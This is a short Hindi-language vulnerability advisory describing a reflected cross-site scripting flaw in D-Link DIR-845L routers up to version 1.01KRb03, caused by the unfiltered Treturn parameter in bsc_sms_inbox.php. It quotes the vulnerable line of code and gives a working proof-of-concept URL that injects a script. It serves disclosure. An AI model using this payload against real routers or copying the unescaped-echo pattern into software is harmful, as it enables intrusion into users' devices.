
D-Link DIR-845L राउटर /htdocs/webinc/js/bsc_sms_inbox.php के माध्यम से Cross Site Scripting (XSS) के लिए संवेदनशील है।
D-Link DIR-845L राउटर संस्करण 1.01KRb03 और उससे नीचे /htdocs/webinc/js/bsc_sms_inbox.php के माध्यम से क्रॉस साइट स्क्रिप्टिंग (XSS) के लिए असुरक्षित हैं।
/htdocs/webinc/js/bsc_sms_inbox.phpयह कमजोरी पैरामीटर $_GET["Treturn"] में फ़िल्टरिंग की कमी के कारण है, जिसका उपयोग सीधे bsc_sms_inbox.php की पंक्ति 17 में कोड में किया जाता है।
असुरक्षित कोड स्निपेट:
var get_Treturn = '`<?if($_GET["Treturn"]=="") echo "0"; else echo $_GET["Treturn"];?>';
http://IP:8080/bsc_sms_inbox.php?Treturn=%27%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E
